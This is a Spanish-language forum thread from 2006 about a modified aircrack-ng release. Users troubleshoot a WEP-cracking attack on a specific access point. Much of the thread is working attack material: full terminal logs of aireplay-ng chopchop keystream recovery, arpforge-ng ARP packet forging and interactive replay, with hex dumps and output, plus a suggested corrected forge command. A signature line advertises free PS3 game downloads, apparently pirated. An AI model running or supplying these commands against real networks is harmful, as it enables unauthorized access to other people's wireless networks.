Aircrack-ng MotherFucker Edition version 1.1 (wifislax 2.0)

Iniciado por thefkboss, 22 Agosto 2006, 14:22 PM

0 Miembros y 1 Visitante están viendo este tema.

HeLLCiTo

es la primera vez que pruebo esta version antes estaba solo tasteando bueno me he puesto a capurar paquetes, estoy con un ataque chopchop y un arp normalito, porque avanzantanto los paquetes en mis clientes y no en lo que capturo?


pianista

Umm seguro que el paquete con el que haces chopchop tenia FromDs 1??
Tiene que venir del AP para que funcione..
En cuanto a los clientes o tienen el emule o quizas el chopchop lo estas haciendo al contrario de como te digo ;)
Saludoss

HeLLCiTo

#362
si tenia fromds 1 , era este

CitarSize: 96, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:13:49:***
         Dest. MAC  =  00:13:02:***
        Source MAC  =  00:13:49:***

        0x0000:  0842 2c00 0013 0214 4585 0013 499d e956  .B,.....E...I..V
        0x0010:  0013 499d e956 9070 3dba 5800 bc07 ae22  ..I..V.p=.X...."
        0x0020:  32fb 6a9c 804c f7e0 d692 0a6f ff80 ff48  2.j..L.....o...H
        0x0030:  4cad 7bc3 b949 c5ab ad69 2ddd a30c 3db4  L.{..I...i-...=.
        0x0040:  a934 d719 98b9 4b88 eecb ff60 5fde 8223  .4....K....`_..#
        0x0050:  8fc8 7f9e 284d 9b36 6479 68b9 5c54 fad6  ...(M.6dyh.\T..

lo forge asi
Citar
arpforge-ng replay_dec-1204-205908.xor 1 00:13:49:*** 0    .168.1.200 192.168.1.1 arp.cap

si embargo el que envio no parece tener fromds

Citarroot@angel-ubuntu:/home/angel# aireplay-ng --interactive -r arp.cap ath1


        Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  00:13:49:***
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:11:22:33:44:55

        0x0000:  0841 0201 0013 499d e956 0011 2233 4455  .A....I..V.."3DU
        0x0010:  ffff ffff ffff 8001 3dba 5800 bc07 ae22  ........=.X...."
        0x0020:  32fb 6a9a c58d ffd8 bf73 0a6e 0290 d9fc  2.j......s.n....
        0x0030:  59d6 8eca 7829 c48a a669 48dc 63a4 3cb5  Y...x)...iH.c.<.
        0x0040:  33bd 7c0a     


la cosa no mejora debo haber forjado o hecho algo mal, pero aun asi el ataque arp debia funcionar.
y en el host , es el4 que sube rapido con 814589 , pero la captura no pasa de 4820

pianista

Normal que no tenga eso pues lo estas creando para mandarlo...
Umm entonces no se que puede fallar....
Pegame aqui absolutamente todos los comandos que usas y lo que te devuelven... ;)
Saludoss

HeLLCiTo

espero que no ocupe mucho.he omitido capturas que ocupaban mucho
Citaroot@angel-ubuntu:/home/angel# aireplay-ng --chopchop -b 00:13:49:9d:e9:56 ath1
Read 17 packets...

        Size: 96, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:13:49:9D:E9:56
         Dest. MAC  =  00:13:02:***
        Source MAC  =  00:13:49:***

        0x0000:  0842 2c00 0013 0214 4585 0013 499d e956  .B,.....E...I..V
        0x0010:  0013 499d e956 9070 3dba 5800 bc07 ae22  ..I..V.p=.X...."
        0x0020:  32fb 6a9c 804c f7e0 d692 0a6f ff80 ff48  2.j..L.....o...H
        0x0030:  4cad 7bc3 b949 c5ab ad69 2ddd a30c 3db4  L.{..I...i-...=.
        0x0040:  a934 d719 98b9 4b88 eecb ff60 5fde 8223  .4....K....`_..#
        0x0050:  8fc8 7f9e 284d 9b36 6479 68b9 5c54 fad6  ...(M.6dyh.\T..

Use this packet ? yes

Saving chosen packet in replay_src-1204-205205.cap

Offset   95 ( 0% done) | xor = FC | pt = 2A |  813 frames written in  2440ms
......
Offset   37 (93% done) | xor = 8C | pt = C0 | 7428 frames written in 22284ms


The AP appears to drop packets shorter than 37 bytes.
Enabling standard workaround:  IP header re-creation.

Saving plaintext in replay_dec-1204-205908.cap
Saving keystream in replay_dec-1204-205908.xor

Completed in 416s (0.14 bytes/s)

root@angel-ubuntu:/home/angel# tcpdump -s 0 -n -e -r replay_dec-1204-205908.cap
reading from file replay_dec-1204-205908.cap, link-type IEEE802_11 (802.11)
20:59:08.419879 DA:00:13:02:***  BSSID:00:13:49:*** SA:00:13:49:9d:e9:5
6 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000), et
hertype IPv4 (0x0800): 81.46.53.161 > 192.168.1.33: ICMP time exceeded in-transi
t, length 36

root@angel-ubuntu:/home/angel# arpforge-ng replay_dec-1204-205908.xor 1 00:13:49:9d:e9:56 0
.168.1.200 192.168.1.1 arp.cap
Done.
root@angel-ubuntu:/home/angel# aireplay-ng --interactive -r arp.cap ath1


        Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  00:13:49:***
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:11:22:33:44:55

        0x0000:  0841 0201 0013 499d e956 0011 2233 4455  .A....I..V.."3DU
        0x0010:  ffff ffff ffff 8001 3dba 5800 bc07 ae22  ........=.X...."
        0x0020:  32fb 6a9a c58d ffd8 bf73 0a6e 0290 d9fc  2.j......s.n....
        0x0030:  59d6 8eca 7829 c48a a669 48dc 63a4 3cb5  Y...x)...iH.c.<.
        0x0040:  33bd 7c0a                                3.|.

Use this packet ? y

Saving chosen packet in replay_src-1204-211514.cap
You should also start airodump-ng to capture replies.

End of file.

al final la saque era de una imagenio, aun asi me queda la duda, igual es mejor que movamos esto al tema del chopchop, si eso avisarme y lo pegamos alli y borro o borrais estos post.

pianista

Umm pues no se que te puede fallar, prueba a forjar el paquete con esto, a ver si va a tener un rango restringido de ips...
arpforge-ng replay_dec-1204-205908.xor 1 00:13:49:9d:e9:56 192
.168.1.34 192.168.1.1 arp.cap

Saludoss
PD:Puedes probar los nuevos scripts que ha hecho Alist3r para el chopchop ;)

Wirelesman

Hola thefkboss he probado tu versión aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3 para windows, y me encanta, asi que no puedo ni imaginarme como será la 0.8, o la 0.9 en la que estas trabajando. Me gustaria que me dijeras si itenes esas mismas versiones para windows, la verdad que hace mucho tiempo que me tendria que haber pasado a linux, la verdad, pero mi pereza se resiste. Pero bueno, si no consigo estas versiones para windows no tendré mas remedio. je je

Muchas gracias

thefkboss

pues no solo saque la 0.3 para windows pero la 0.9 esta incluida en el wifislax 1.1 beta asi q recomiendo q te lo bajes xq aunque no tengas ni idea de linux los ataques se realizan automaticamente es tan facil como (que quieres hacer: para hacer tal pulsa 1 o pulsa 2)
Asi q bajatela ya veras como te gusta.
no creo q las saque para windows ya q lo bueno de las versiones motherfucker son la parte de inyeccion y en windows no se puede por lo q la version 0.3 de la 0.9 de la parte del aircrack no difieren en mucho solo son 2 cosas mas q le he añadido
SI TE GUSTAN LOS JUEGOS DE PS3 Y QUIERES MUCHOS MÁS PINCHA EN MI FIRMA

Descarga todo tus juegos PS3 gratis desde http://ps3spain.com

insig

Quizá esté más que comentado pero no lo encuentro (lo he buscado :( )
En wifislax después de usar los madwifi y tal... Como lo hago para usar la tarjeta en modo normal? Ya que se me queda en modo monitor y tengo que reiniciar para poder navegar de nuevo.

Gracias.

Wirelesman

Entonces tengo que ponerme linux obligatoriamente, no. je je, ya sabia que llegaria este dia mas tarde o mas pronto, je je.
Bueno pues bien.
Solo me queda una duda, que es eso se wifislax 1.1 beta?